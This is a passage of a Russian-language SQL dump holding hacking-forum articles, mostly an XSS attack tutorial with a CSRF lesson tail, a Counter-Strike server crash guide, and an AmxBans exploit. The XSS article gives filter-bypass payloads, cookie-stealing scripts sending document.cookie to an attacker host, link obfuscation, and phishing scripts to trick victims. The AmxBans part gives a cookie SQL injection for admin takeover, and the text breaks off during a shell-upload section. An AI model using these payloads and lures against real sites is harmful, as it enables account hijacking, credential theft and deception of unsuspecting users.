height="1"></ifrаmе><br /><br />"http://yourhost.ru/xsrf.html" коментировать не нужно? xD <br /><br /><br />Подведём скромные итоги<br /><br /><br />•Мы узнали о ещё одном виде уязвимостей <br /> <br />•Научились проводить XSRF-атаки <br /> <br />•Знаем теперь, откуда берётся спам в контакте, даже если аккаунт не взламывали <br /> <br />•Знаем, зачем для смены пароля нужно ввести старый и понимаем, что можно сделать, если пароль меняется без подтверждения <br /> Вот вам и мозговая гимнастика: из последних 2 пунктов сделать для себя чёткие выводы, додумать всё до конца и напридумывать ещё 1001 способ применения этой уязвимости. biggrin <br /><br /> <br />","XSRF или CSRF","journal_images/img_385848.png","1390707549","1");
INSERT INTO gazeta_article VALUES("170","22","Вот и очередной долгожданный урок! smile Последующие уроки будут затрагивать гораздо более сложные темы, нежели предыдущие, поэтому без некоторого вступления в тему "уязвимости" (именно они окажутся под нашим пристальным вниманием в последующих уроках) обойтись не получится. Итак, что же такое уязвимость? Это некоторое несовершенство, недостаток какого-либо приложения, позволяющий при определённых условиях получить повышенные привилегии. Это общий смысл термина. Теперь пройдёмся подробно по всем его составляющим. Уязвимым приложением может являться как программа, установленная на компьютере (в т.ч. драйвера и операционная система), так и любое веб-приложение, например движок сайта или форума (он же CMS - Content Management System, система управления содержимым). Под определёнными условиями понимается не обычное повседневное использование приложения по его прямому назначению, а умышленное эксплуатирование уязвимости (бага). Повышенными привилегиями могут являться: получение доступа к некоторым данным, получение доступа к уязвимому компоненту системы, получение доступа ко всей системе, нарушение работы системы и т.д. Под "повышенными" подразумевается, что в обычных условиях и по замыслу разработчика пользователь не должен был получить данных привилегий и возможностей. Надеюсь, объяснил доступно и суть понятия об уязвимости ясна. Методика эксплуатирования уязвимостей в общих чертах проста: найти и применить уязвимость. Именно этим мы сейчас и займёмся на примере XSS-уязвимости. <br />ЗЫ схема, по которой будет описываться данная уязвимость, будет в дальнейшем применяться и для описания всех остальных багов. <br /><br /><br />XSS<br /><br />XSS - Cross Ste Scripting (CSS уже занято Cascade Style Sheets). Уязвимость, возникающая вследствии недостаточной фильтрации вводимых пользователями и в дальнейшем отображаемых на страницах сайта данных. Позволяет разместить непосредственно на страницах сайта произвольный html-код (соответственно, код будет выполняться у всех пользователей, зашедших на страницу). <br />Давайте подумаем, что значат для нас такие возможности. Что можно сделать интересного при помощи html. Ну, во-первых, можно просто нашалить: вывести надпись огромных размеров (да любые возможности форматирования текста в html) или поставить редирект на другой сайт (на фейк, естественно wink ). Редирект, если что, делается так: <br /><br /><br />Code<br /><br /><META HTTP-EQUIV='Refresh' content ='0; URL=http://КУДА_ПЕРЕНАПРАВИТЬ'><br />. Можно также залить эксплойт или выполнить какой-либо javascript-код (как говорится, где html, там и яваскрипт). Выполнение нашего js-кода в свою очередь, даёт возможность позаимствовать аутентификационные данные пользователя - cookies (они же куки, кукисы и печеньки). Это временные файлы, которые сохраняются в браузере пользователя после авторизации. В некоторых случаях можно подставить заимствованные куки вместо своих и таким образом авторизоваться на сайте от чужого лица. Но пока не это для нас главное. Сначала уязвимость нужно... найти! <br /><br /><br />Поиск уязвимости<br /><br /> Для того, чтобы обнаружить xss, нужно проверить на её наличие все потенциально уязвимые элементы сайта. В данном случае таковыми являются поля ввода текста, который в последующем будет отображён на страницах сайта (принтабельные поля). Это могут быть поля отправки сообщения, темы сообщения и т.п. Следует проверять на наличие уязвимости каждое такое поле. Для этого поизводим последовательно всё нижеописанное до тех пор, пока не увидим аналогичное сообщение: <br /><br /> <br /><br />Итак, начинаем искать - подставляем во все принтабельные поля следующий код: <br /><br /><br />Code<br /><br /><script>alert('')</script><br /><br />Ничего? Ок, пробуем так: <br /><br /><br />Code<br /><br />"><script>alert('')</script><br /><br />Опять ничего!? >< Смотрим сурс (исходник) странички и ищем там что-то похожее на код выше (то есть ищем то, что мы туда внедрили). Нашли? Смотрите, что стало с нашим кодом. Скорее всего, были отфильтрованы спец-символы < и >. Без них код работать, ясное дело, не будет... Они убили скрипт! Сволочи! xD Фильтрация этих символов означает одно: активной xss здесь нет. Но не отчаиваемся, ещё есть вариант с пассивными xss и даже есть шанс обойти фильтрацию! Но об этом чуть позже (см. дополнения). <br />Если всё же вам удалось лицезреть сообщение, значит вы нашли уязвимое поле! Ура, товарищи! <br /><br /><br />Эксплуатирование XSS<br /><br />Для того, чтобы найти уязвимость, мы использовали код alert(''), который выводил пустое сообщение. Теперь, когда уязвимость найдена, можно заменить этот код на тот, который нужен нам. В описании уязвимости я говорил о том, что можно сделать. Вообще, в данном случае ваши возможности ограничены лишь возможностями html и javascript. Но особо хотелось бы осветить вопрос похищения аутентификационных данных пользователя (кукис). Кукис - временные файлы, передаваемые пользователю сервером при входе с целью дальнейшей его идентификации (дабы не вводить пароль при каждом обновлении страницы). Иногда они могут содержать логин и\или пароль пользователя в зашифрованном виде. Этот способ взлома основывается на том, что пользователь (а точнее один из видов xss-уязвимости) выполняет в браузере определённый код. Этот код выполняет запрос на сниффер в виде куков жертвы. Так кукис приходят на сниффер. Важное условие - жертва должна быть авторизована на сайте (должна была получить кукис, которые отправляет скрипт). <br />Возможно, вам не даёт покоя слово сниффер? <br /><br /><br />Quote (Wikipedia)<br /><br />Анализатор трафика, или сниффер (от англ. to sniff — нюхать) — сетевой анализатор трафика, программа или программно-аппаратное устройство, предназначенное для перехвата и последующего анализа, либо только анализа сетевого трафика, предназначенного для других узлов.<br /><br />Помимо снифферов сетевых устройств, есть ещё и http-снифферы. Они предназначены для ловли и записи http-запросов, отправленных им, а также ip-адреса и версии браузера пользователя, отправившего запрос. В нашем случае таким запросом на сниффер будут приходить cookies жертвы. <br />Итак, нам нужно заиметь сей инвентарь - http-сниффер. Качаем и ставим сниффер моей сборки... (MX-software proudly presents... эм, так, о чём это я...) и внимательно там читаем инструкцию по установке! Кстати, советую сначала обкатать и изучить всё на локалхосте (просто так в сто раз быстрее). Поставили? Вот и всё, уже можно юзать!... ах, да, вы же не умеете... но ничего, сейчас объясню! biggrin <br /><br /><br />Использование http-сниффера<br /><br />(Кто умеет, всё равно гляньте по-быстрому, может что нового поймёте =) ) <br />Итак, заходите на сайт, где находится ваш сниффер. Знакомимся с интерфейсом: есть дата и время зачем-то ещё наш ip. За ними кнопочка обновления лога. А ещё есть таккая штука, как картинка сниффера. Имя её в моей сборке - s.gif Вот именно через обращения к этой картинке сниффер и ловит все запросы. Откройте эту самую картинку (yourhost.com/s.gif) и обновите лог. Видите новую запись? В нашем распоряжении время совершения запроса, ip того, кто обратился к картинке, пустая строка запроса (QUERY), реферер (с какого сайта совершено обращение к картинке) и агент (т.е. браузер) пользователя. Теперь попробуйте к ссылке на картинку дописать что-нибудь после знака "?". Например, так: <br /><br />Code<br /><br />http://yourhost.com/s.gif?шо за нах o_O!<br /><br />Обновляем, смотрим строку запроса (QUERY). Вывод: сниффер запишет всё, что было после ? (это и есть запрос). <br />Итак, если вы нашли xss, вам нужен код, крадущий кукис. Каждый раз при открытии страницы с этим кодом, он будет отправлять на сниффер куки от этой страницы. Для обычной активной xss, рассматриваемой в этом уроке код будет таким: <br /><br /><br />Code<br /><br /><script> img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cookie; </script><br /><br />Можно так же сделать так, чтобы после выполнения кода происходил редирект (переадресация) на другую страницу: <br /><br /><br />Code<br /><br /><script> img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cookie; <br /> location.href ="http://адрес_редиректа/" </script><br /><br />Не забудьте заменить yourhost.com на адрес вашего сниффера во всех кодах! <br />Вот о чём чуть не забыл! Все эти коды я для удобства присобачил к снфферу, найдёте их там по ссылке "коды для кражи кукис"! <br /><br />Дальше идут очень важные факты, которые нужно чётко понимать.<br /><br />Если пользователь не авторизован на сайте (не вошёл под своим логином и паролем) - у него нет кукис. Если куков нет - будет отправлена пустая строка. Нельзя получить кукис от другого сайта или сервера (например, на ucoz_е кукис с аутентификационными данными находятся на другом сервере и как бы на другом сайте). Кукис имеют ограниченный "срок годности": по истечении их времени действия на сервере будет изменён номер сессии для данного пользователя и кукис станут "недействительными". Время действия может быть различно в зависимости от настроек сервера или пользовательских. Сессия может быть закрыта так же вручную пользователем, например при нажатии кнопки "выход" на сайте. Иногда в кукисах хранятся зашифрованные логин и/или пароль пользователя (о способах их расшифровки - чуть позже). <br />Предположим, вам удалось получить кукисы жертвы. Что же теперь с ними делать? Будем подставлять их вместо своих! В Mozilla Firefox такой возможности нет, будем юзать Opera. Заходите на тот самый сайт под своими логином и паролем, дабы создать папку с куками. Теперь топаем в инструменты --> дополнительно --> управление cookies. <br /><br /> <br /><br />Тперь нужно найти папку нужного сайта и заменить наши куки на те, которые пришли на сниффер. Думаю, здесь нет ничего сложного. Кукис приходят в виде имя=значение;. А в папке как раз список имён. Двойной щелчок - открывается окошко. Заменяем поле "значение" и тыкаем ок. Так пока не заменим всё, что нам пришло. Теперь закрываем управление cookies и обновляем страницу. Если всё сделали правильно - вы станете тем, чьи куки подставили (войдёте в его аккаунт)!<br /><br /><br />Дополнение 1<br /><br /><br />Поиск и обход фильтров<br /> <br /> Освежим в памяти один момент из основной части урока: <br /><br /><br />Quote<br /><br />Смотрим сурс (исходник) странички и ищем там что-то похожее на код выше (тоесть ищем то, что мы туда внедрили). Нашли? Смотрите, что стало с нашим кодом. Скорее всего, были отфильтрованы спец-символы < и >. Без них код работать, ясное дело, не будет... Они убили скрипт! Сволочи! xD Фильтрация этих символов означает одно: активной xss здесь нет. Но не отчаиваемся, ещё есть вариант с пассивными xss и даже есть шанс обойти фильтрацию! Но об этом чуть позже (в скором дополнении к уроку).<br /><br />Во время поиска XSS вы гарантированно будете сталкиваться с подобной фильтрацией. При чём фильтроваться могут не только символы < и > , но и многие другие не менее важные для проведения атаки (внедрения работоспособного кода). В их числе: <br /><br /><br /><br />Code<br /><br /><>=();/""+<br /><br /><br /><br />Проверяем фильтр<br /><br /> Просто ставим в принтабельное поле все нужные нам символы, а потом ищем их в исходнике страницы. Чтобы проще было искать, можно ещё добавить в середину какое-нибудь слово, напр. XSS просто для ориентира. smile <br />Нашли? Смотрите, что осталось на месте, а что "изуродовалось" фильтром. <br />Сразу скажу, что если эти символы (хоть какие-то из нужных нам кроме < >) заменяются на что-то другое ли удаляются, оставьте все ваши тщетные попытки внедрить код! <br />Если же символы < > просто удалились, можно попробовать поставить тег (имено так называют эти скобки и ключевые слова в них), и Фильтр либо пропустит и не удалит это (ведь теперь тэг не пустой), либо отфильтрует как запрещённый тег. Если пропустил - всё шикарно, переходим к вставке нужного нам кода (код сниффера для кражи кукис, помните? smile ). А если тупо удалил, подставим вместо что-нибудь такое: <br /><br /><br />Code<br /><br /><scr<script>ipt><br /><br />Скорее всего, фильтр удалит только в середине, и у нас останется рабочий тег. В случае, если снова удалились только < >, а осталось голое "sсript", тут явный облом и уязвимости нет. <br />Ну а если < > всё таки фильтруются не всегда? Давайте экспериментировать и попытаемся всё таки вывести сообщение (alert) с текстом! <br />Начнём с того, что забьём на классический и заменим его каким-нибудь другим тегом. Итак, если alert выводится так: <br /><br /><br />Code<br /><br /></script>alert('XSS')<script><br /><br />то в вариациях с различными тегами можно попытаться встроить что-нибудь из этого: <br /><br /><br />Code<br /><br /><br /> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <br /><br /> <BODY ONLOAD=alert('XSS')> <br /><br /> <BODY BACKGROUND="javascript:alert('XSS')" > <br /><br /> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <br /><br /> <IMG SRC=javascript:alert('XSS')> <br /><br /><br />Внимание! По некоторым сведениям, код в теге IMG может не работать в браузере Mozilla Firefox, поэтому предпочтительно избегать использования этого тега. <br />В общем, экспериментируйте с тегами, смотрите, как они изменяются, анализируйте поведение фильтра и, возможно, найдёте рабочую комбинацию! <br />Из всего выше прочитанного можно сделать неутешительный вывод, что активная xss - штука тонкая и даже простому фильтру, отсеивающему только символы < > мы не в силах ничего противопоставить. Но ведь не каждый фильтр отсеивает < >, да и неопытные кодеры обычно ставят запрет как раз только на , а мы ведь знаем, что пользоваться можно не только этим тегом. wink <br /><br /><br /><br />Дополнение 2<br /><br /><br />Пассивные XSS<br /> <br />Что, думали прочитали основную статью с дополнением и на этом всё, уже всё узнали про xss? Рано радутесь! Вплоть до этого момента речь у нас шла только об активных XSS, которые встраивались в тело страницы и сохранялись. Теперь неплохо бы разобраться ещё и с пассивными XSS. Их отличие от активных состоит в том, что пассивки мы внедряем не в тело страницы, а в адресную строку, и код нашей xss не будет сохраняться на сайте, для его выполнения придётся впарить жертве ссылку с кодом. Но обо всём этом поговорим подробно чуть позже. Итак, делаем умное лицо и начинаем вникать! xD <br /><br /><br />Поиск уязвимости<br /><br /> Как вы помните, для поиска активок, мы подставляли скрипт во все принтабельные поля. Теперь мы будем проводить похожий ритуал, только код будем подставлять в адресную строку (естественно, на различных страницах сайта). По поводу адресной строки поясняю... <br />Допустим, есть адрес _http://site.com/index.php?page=1 То, что там стоит после знака ? (page=1) - это данные, передаваемые скрипту на сервере (имя скрипта идёт перед ? - index.php) get-запросом. Сами данные имеют вид "параметр=значение" (page=1). Вот наши скрипты мы будем подставлять именно как значение (после =). Пока из прочитанного вам нужно хорошо усвоить, как выглядят адреса, в которые можно пропихнуть xss (иначе как вы будете эти уязвимости искать?), а сайты с пассивками для тренировки можно найти тут. <br />Итак, для проверки будем подставлять после = по очереди скрипт с алертом в различных вариациях: <br /><br /><br />Code<br /><br /><br /> <script>alert('XSS')</script> <br /> "><script>alert('XSS')</script> <br /> '><''>"><script>alert(/XSS/)</script> <br /><br /><br />Ставим после = сначала первый скрипт, жмём энтер, ждём окончания загрузки страницы. И так перебираем, пока не увидим таки вожделенное окошко алерта (картинка была выше). Если подстановка ничего не дала, курим обход фильтров (см. доп. 1). <br /><br /><br />Эксплуатирование<br /><br /> Когда речь шла об активках, мы с вами говорили о том, что на страницу можно было внедрить любой код. С пассивками всё обстоит точно также, но так как страница с внедрённым кодом нигде не сохраняется и может быть передана жертве только в виде ссылки вместе с xss-кодом, то чаще всего данную уязвимость используют только с целью хищения аутентификационных данных (кукис). <br />Итак, теперь вместо безобидного скрипта с алертом нужно внедрить крипт сниффера. Тут встают такие проблемы, как множество символов, используемых в скрипте, которые могут фильтроваться, а также значительная длина вставляемого кода. Решать будем очень просто: код сниффера разместим у себя на хосте (можно даже там же где сниффер xD), а в самой xss будет лишь вызов этого скрипта. Как же это реализовать? <br />Вместо значения в адресной строке (куда подставляли алерт при поиске) вставляем сей код: <br /><br /><br />Code<br /><br /><SCRIPT type=text/javascript src=http://yourhost.com/script.js></SCRIPT><br /><br />Важный момент: если в алерт подставляли код, где перед стояло ещё что-то (например, алерт срабатывал так: ">alert('XSS')), то это что-то (в нашем случае ">) нужно будет оставить и перед кодом сниффера! <br />Кстати, не забываем заменить yourhost.com в коде на реальный адрес вашего хоста, где будет лежать скрипт. А теперь что касается самого скрипта: файл script.js имеет такое содержание: <br /><br /><br />Code<br /><br />img=new Image(); img.src="http://yourhost.com/s.gif?"+document.cookie; <br /> location.href = "http://google.ru"<br /><br />Где s.gif - картинка вашего сниффера, ну а про yourhost.com расскажет капитан Очевидность. хD <br />Вторая строка - переадресация ползователя куда-либо (в нашем случае в гугл =) ). Если хотите оставить пользователя на той же странице, где он и был, оставьте кавычки пустыми. Но не удаляйте строку редиректа! Иначе пользователь так и останется на странице с картинкой вашего сниффера и может заподозрить неладное... (не знаю что он будет делать, но зачем лишний раз палиться и тревожить нервных юзеров? xD) <br />Вот теперь при переходе по вашей ядовитой ссылке (которая будет иметь вид _http://site.com/index.php?page=) будет запускаться код сниффера, который, в свою очередь, запишет куки в лог, а потом либо оставит жертву в покое, либо перекинет на другой сайт. <br />Собственно, все коды, как и файл script.js входят в комплект поставки моего сниффера. Приятного вам хака! <br /><br /><br />Дополнение 3<br /><br /><br />Шифруем подозрительную ссылку<br /> <br /> Ещё немного дополню... имхо давать пользователям (а тем более админам) вот такие ссылки <br /><br /><br />Code<br /><br />http://site.com/index.php?page=<SCRIPT type=text/javascript src=http://yourhost.com/script.js></SCRIPT><br />в открытом виде слишком палевно... вам не кажется? Сейчас будем их прятать! smile <br />Способ 1: топаем на tinyurl.com и вбиваем туда нашу ссылку. Получаем в результате другую... короткую и загадочную :wink: А результат её работы - тот же :banana: <br />Способ 2: будем шифровать в base 64. Заходим сюда и кладём в поле нашу ссылку. Жмём "Encode" и получаем: <br /><br />Quote<br /><br />aHR0cDovL3d3dy5jLXNwYW52aWRlby5vcmcvdmlkZW9MaWJyYXJ5L3NlYXJjaC1yZXN1bHRzLnBocD9rZXlbXT08U0NSSVBUIHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz1odHRwOi8v aHR0cHoucnUvZzRjdXdsNDhlZGdvLmpzPjwvU0NSSVBUPiI=<br />Это наша ссылка в base64. Теперь можно преподносить её жертве в виде<br /><br />Quote<br /><br />data:text/html;base64,aHR0cDovL3d3dy5jLXNwYW52aWRlby5vcmcvdmlkZW9MaWJyYXJ5L3NlYXJjaC1yZXN1bHRzLnBocD9rZXlbXT08U0NSSVBUIHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz1odHRwOi8v aHR0cHoucnUvZzRjdXdsNDhlZGdvLmpzPjwvU0NSSVBUPiI=<br />Способ 3: кодируем в url ядовитую часть ссылки. Кодировать можно тут. Получим ссылку такого вида:<br /><br />Quote<br /><br />http://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascript%20src%3Dhttp%3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js%3E%3C%2FSCRIPT%3E%22<br />Во всех 3 случаях результат работы и способ применения ссылки один и тот же. Не забывайте, что при этом ещё необходимо правильно применить СИ, чтобы жертва перешла по ссылке, находясь на атакуемом сайте!<br /><br /><br />Дополнение 4<br /><br /><br />Самодостаточные XSS<br /> <br />Наконец-то добрались до последнего вида xss! По технике проведения атак эти xss, пожалуй, самые простые. Здесь не нужно искать никаких уязвимостей, здесь не нужно бояться фильтрации на сайте и заботиться о её обходе, здесь для проведения атаки кроме доверчивой жертвы вообще ничего не нужно (и это, блин, главный минус). Суть атаки заключается в том, что мы впариваем жертве ядовитый код с картинкой сниффера, как и раньше, она вставляет код в адресную строку, чтобы он выполнился, но... <br />1) этот код - не ссылка, поэтому будет работать с любого сайта. То есть жертва может запустить код вообще в новом окне и никаких кукисов не придёт(( <br />2) жертва может заподозрить неладное, когда нельзя просто нажать на ссылку, а нужно её в адрес копировать. <br />Хотя эти проблемы легко решаются при помощи СИ (социальной инженерии). Можно, например сказать так: <br /><br /><br />Quote<br /><br />Ой, смотри какой прикол нашёл на <атакуемый сайт>! =) Вот если в адрес вставить там вот это: <даёте код> <br />Короче, не скажу, а то так не интересно ;)<br /><br />Но это если жертва... блондинко\тупая\любопытный пацанчик (нужное подчеркнуть). Хотя любопытство очень часто берёт верх над здравым смыслом... даже если здравый смысл говорит: "ссылка не знакомая... ненадо!...хотяяяя..." Если ваша цель - менее падкий на всякие "глупые прикольчики" человек, можно предложить такой вариант: <br /><br /><br />Quote<br /><br />Добрый день, уважаемый username! <br />Вы получили это сообщение, потому что зарегистрированы на сайте таком-то. <br />Сегодня приблизительно в 2:00 произошёл сбой сервера СУБД (чем больше умных слов, тем лучше!). Причины сбоя не известны, на данный момент существует предположение о том, что сервер подвергся хакерской атаке. Так как на сервере находилась база логинов и паролей пользователей, возможно хищение пользовательских данных. <br />С целью защиты личных данных пользователей, все аккаунты, которые не пройдут процедуру подтверждения и смены пароля, будут удалены втечение суток. Пожалуйста, пройдите процедуру подтверждения, это не займёт у вас много времени: (смягчаем угрозу удалить аккаунт вежливой просьбой =) ) <br />1) Проверьте, можете ли вы авторизоваться на сайте используя ваши логин и пароль. (тут можно для верности ещё ссылку на фейк :wink:) <br /> 2) Смените ваш пароль. (делать это не обязательно, но настоятельно рекомендуем сменить пароль для вашей безопасности!) <br />3) Вставьте код подтверждения в адресную строку, находясь в вашем личном кабинете на сайте. <br />Код подтверждения: <br /> ======================== <br /><даёте код> <br /> ======================== <br />Внимание! Не завершайте вашу сессию на сайте (при помощи кнопки выхода) некоторое время или до завершения проверки всех аккаунтов, иначе ваше подтверждение может аннулироваться. Об окончании проверки все пользователи будут извещены по e-mail. <br />Благодарим за сотрудничество.\спасибо что вы с нами! (по вкусу) <br />Администрация какого-то сайта. <br /><br />_______________ <br />Это сообщение отправлено автоматизированной системой рассылки, отвечать на него не нужно. <br /><br /><br />Итак, это были просто примеры применения СИ в этой ситуации, думаю с впариванием кода всё ясно. =) <br />Что-то меня занесло в другую тему и я отвлёкся (ну ничего, это тоже может пригодиться)... <br />Всётаки вернёмся к сути... как вы уже поняли, код выполняется при вставке в адресную строку и нажатии на Enter. Попробуйте вставить это (знакомый код, а? =) ): <br /><br /><br /><br />Code<br /><br />javascript:alert('')<br /><br />Думаю, много пояснений не нужно, вот сам код (в моей сборке сниффера он есть): <br /><br /><br />Code<br /><br />javascript:document.write('<script>img=new Image();img.src="http://yourhost.com/s.gif?"+document.cookie;location.href=""</script>')<br /><br />Если хотите после выполнения кода оставить пользователя где он был, то так этот скрипт и сделает)) А если надо добавить редирект, допишите после 2 фразы location.href адрес, куда нужно редиректить. Например, так: <br /><br /><br />Code<br /><br />javascript:document.write('<script>img=new Image(); img.src="http://yourhost.com/s.gif?"+document.cookie; location.href="http://адрес_редиректа/" </script>')<br /><br />А ещё, если вы использовали легенду о "коде подтверждения", можете в конец этого скрипта дописать что-нибудь такое (чтобы успокоить взволнованного пользователя): <br /><br /><br />Code<br /><br />;alert('Аккаунт подтверждён успешно! #Код200')<br /><br />Для меньшей палевности адресов и большей загадочности кода (чтобы у юзеров отпало желание разбираться), можно воспользоваться точно теми же методами шифрования, что были приведены в дополнении 3. <br />Почему в этой части уделил так много внимания СИ? Да потому, что в случае с самодостаточными xss сложностей по технической части чуть меньше чем нихрена, а самое главное - ненавязчиво, но понятно и убедительно объяснить жертве, куда и как вставлять код. <br />Ну чтож, вперёд на сервисы анонимной отправки почты рассылать наш код! xD <br /><br /><br />Дополнение 5<br /><br /><br />Заливка кода через файлы<br /> <br /> Я вернулся и решил описать ещё пару методов вставки xss кода! *ацкий смех* <br />Есть на многих сайтах возможности выкладывать картинки, а иногда даже флэш-анимации(!) прямиком на страницы сайта (или форума или блога). И я говорю не о том, что мы видели вконтакте, когда картинки загружаются на сервер, а потом там обрабатываются перед добавлением на страницы, а когда мы указываем ссылку на изображение и происходит его прямая вставка на страницу. Грех не воспользоваться такой возможностью! Хитрость в том, что можно ведь в картинку и код сниифера вставить и получится у нас таким образом активная xss (которые по понятным причинам ценнее и эффективнее пассивок), ведь атаке будет подвержен каждый, кто встретит картинку на сайте. <br /><br /><br />Начиняем картинку кодом<br /><br /> Тут всё проще простого. Создаём файл с содержимым в виде кода для пассивки: <br /><br /><br />Code<br /><br /><script> <br /> img = new Image(); <br /> img.src = "http://yourhost.com/s.gif?"+document.cookie; <br /> </script><br /><br />И сохраняем с расширением .gif Теперь заливаем это на какой-нибудь хостинг, чтобы получить прямую ссылку к картинке безо всяких изменений. <br />Вот теперь можно класть картинку на форумы, в блоги, гостевые и везде, где есть вставка картинок. <br />Кстати, эту фишку можно провести не только с вставкой картинок, но и любых других файлов, в тех случаях, если файл можно залить на сайт и если его содержимое будет отображаться на странице сайта. <br /><br /><br />Итак, что же мы теперь умеем:<br /><br /><br />•Искать и применять активные xss-уязвимости <br /> <br />•Обходить некоторые простые виды фильтрации <br /> <br />•Пользоваться http-сниффером <br /> <br />•Красть аутентификационные данные пользователя через xss <br /> <br />•Подставлять эти данные для авторизации от лица жертвы <br /> <br />•Находить и использовать пассивные xss <br /> <br />•Шифровать ссылки с xss-кодом <br /> <br />•Проводить самодостаточные xss атаки <br /> <br />•Впаривать код сниффера с приминением элементарных приёмов СИ <br /> <br />•Заливать xss-код через не обрабатываемые сервером файлы <br /> <br />","Поиск уязвимости xss и взлом.","journal_images/img_123882.png","1390707688","1");
INSERT INTO gazeta_article VALUES("171","22","Итак, наблюдая по мониторингам больше создаются сервера в Counter-Strike: Source v34.<br />Существуют несколько способов взломов.<br />В основном самые дырявые плагины и прочие компоненты.<br />К примеру EScript который принимает все виды скриптов, но он уязвим. С помощью него хакер также сможет сделать Краш сервера, либо Взлом админки.<br />Также относится к всему перечисленому Mani Admin Plugin.<br /><br />Итак, как воспользоватся взломом:<br />1. Прогуглить ManiAdminTakeOver "У него встроенный Lua Gui который позволяет запускать скрипты"<br />2. Заливаем в папку cstrike.<br />3. Запускаем CSS<br />И еще, возможен бан от сервера, т.к TakeOver палится (<br />4. Заходим на сервер<br />5. Набираем ManiAdminTakeOver либо SmAdminTakeOver.<br />6. Набираем в консоле openscript crash.lua "и после активации скрипта, сервер должен ресет сделать."<br /><br />Пробовал на одном Школосервере, хоть админку не получил, а краш огранизовал, и если скрипт запустать по многу раз, то бывали случаи что сервера были в Ауте ~ 15 минут.<br />Как же защитить сервер?<br />Не нужно ставить всякие антидудос компоненты, а поставить KAC и D-Fens.<br />А также, не ставить кучу безделушных плагинов.<br /><br />Крч, всем салют. Еще будут статьи / и скоро будет тутор по созданию собственного сервера на vps / vds.","Взлом сервера CS:S / Методы Защиты","journal_images/img_123992.png","1426437584","36");
INSERT INTO gazeta_article VALUES("172","22","Версия: 6.0.0<br />Дата релиза: 21.05.10<br /><br /><br />Получение прав администратора<br /><br />Зависимости: нет<br /><br />File: /include/access.inc.php<br /><br /><br />[code]session_start(); <br />require_once("config.inc.php"); <br /><br />function has_access($value) { <br /> if($_SESSION["loggedin"]) { <br /> return $_SESSION[$value]; <br /> } <br /> return 0; <br />} <br />if(!$_SESSION["lang"]) echo "NO!"; <br />if(isset($_COOKIE[$config->cookie]) && $_SESSION["loggedin"]==false) { <br /> <br /> $cook = explode(":", $_COOKIE[$config->cookie]); <br /> <br /> $sid = $cook[0]; <br /> <br /> <br /> $mysql = mysql_connect($config->db_host,$config->db_user,$config->db_pass) or die (mysql_error()); <br /> $resource = mysql_select_db($config->db_db) or die (mysql_error()); <br /> $query = mysql_query("SELECT id,username,level,email FROM `".$config->db_prefix."_webadmins` WHERE logcode='".$sid."' LIMIT 1") or die (mysql_error()); <br /> if(mysql_num_rows($query)) { <br /> while($result = mysql_fetch_object($query)) { <br /> echo $_SESSION["uid"]=$result->id; <br /> echo $_SESSION["uname"]=$result->username; <br /> $_SESSION["email"]=$result->email; <br /> echo $_SESSION["level"]=$result->level; <br /> $_SESSION["sid"]=session_id(); <br /> $_SESSION["loggedin"]=true; <br /> } <br /> $query = mysql_query("SELECT * FROM `".$config->db_prefix."_levels` WHERE level=".$_SESSION["level"]." LIMIT 1") or die (mysql_error()); <br /> while($result = mysql_fetch_object($query)) { <br /> $_SESSION['bans_add'] = $result->bans_add; <br /> $_SESSION['bans_edit'] = $result->bans_edit; <br /> $_SESSION['bans_delete'] = $result->bans_delete; <br /> $_SESSION['bans_unban'] = $result->bans_unban; <br /> $_SESSION['bans_import'] = $result->bans_import; <br /> $_SESSION['bans_export'] = $result->bans_export; <br /> $_SESSION['amxadmins_view'] = $result->amxadmins_view; <br /> $_SESSION['amxadmins_edit'] = $result->amxadmins_edit; <br /> $_SESSION['webadmins_view'] = $result->webadmins_view; <br /> $_SESSION['webadmins_edit'] = $result->webadmins_edit; <br /> $_SESSION['websettings_view'] = $result->websettings_view; <br /> $_SESSION['websettings_edit'] = $result->websettings_edit; <br /> $_SESSION['permissions_edit'] = $result->permissions_edit; <br /> $_SESSION['prune_db'] = $result->prune_db; <br /> $_SESSION['servers_edit'] = $result->servers_edit; <br /> $_SESSION['ip_view'] = $result->ip_view; <br /> } <br /> }[/code]<br /><br />Как видим, никак не проверяется параметр COOKIE, выполняется запрос к БД, в ходе которого мы получаем в сессии данные админа/етц. $config->cookie в 99% случаев расна дефолтному: amxbans. Разделение идет через ":", из чего строим простой запрос:<br /><br />Target: <br /><br />Передаем в Cookies:<br />[code]Cookie: amxbans=' or id=1+union+select+1,2,1,4 -- 1[/code]<br /><br />Передать нужно именно эти данные, именно в таком порядке.Переходим на индекс - мы админы.<br /><br />+ Данные админов можно читать, шлем запрос с ид нужного админа, получаем его данные в бд, и далее идем на страницу любого бана, и пытаемся отписать комментарий( включить в админке) - в поле E-mail Вывод. так же вывод в правом верхнем углу экрана, рядом с кнопкой админки.<br />+ Уязвимость будет существовать даже при MQ=on, так как в config.php(который подрубается в таргете):<br /><br />[code]function stripslashes_recursive($var) { <br /> return (is_array($var) ? array_map('stripslashes_recursive', $var) : stripslashes($var)); <br />} <br />if (get_magic_quotes_gpc()) { <br /> $_GET = stripslashes_recursive($_GET); <br /> $_POST = stripslashes_recursive($_POST); <br /> $_COOKIE = stripslashes_recursive($_COOKIE); <br />} <br />PHPinfo[/code]<br /><br />File: <br /><br />Плюшка от дефелоперов, просто переходим по ссылке.<br /><br />Заливка шела<br /><br />File: include/modules/modul_iexport.php<br /><br />[code]if(isset($_POST["bancfgupl"])) { <br /> <br /> $reason=mysql_real_escape_string($_POST["reason"]); <br /> $plnick=mysql_real_escape_string($_POST["player_nick"]); <br /> $server=mysql_real_escape_string($_POST["server_name"]); <br /> $date=explode("-",trim($_POST["ban_created"])); <br /> <br /> if($reason=="" II $plnick=="" II $server=="" II $date=="" II sizeof($date)!=3) { <br /> $user_msg="_NOREQUIREDFIELDS"; <br /> } else { <br /> $date=(int)strtotime($date[2].$date[1].$date[0]); <br /> $file=mysql_real_escape_string($_FILES['filename']['name']); <br /> $types=array("cfg","txt"); <br /> <br /> if($file=="") { <br /> $user_msg="_FILENOFILE"; <br /> } else { <br /> $file_type=substr(strrchr($file, '.'),1); <br /> if(!in_array($file_type,$types)) $user_msg="_FILETYPENOTALLOWED"; <br 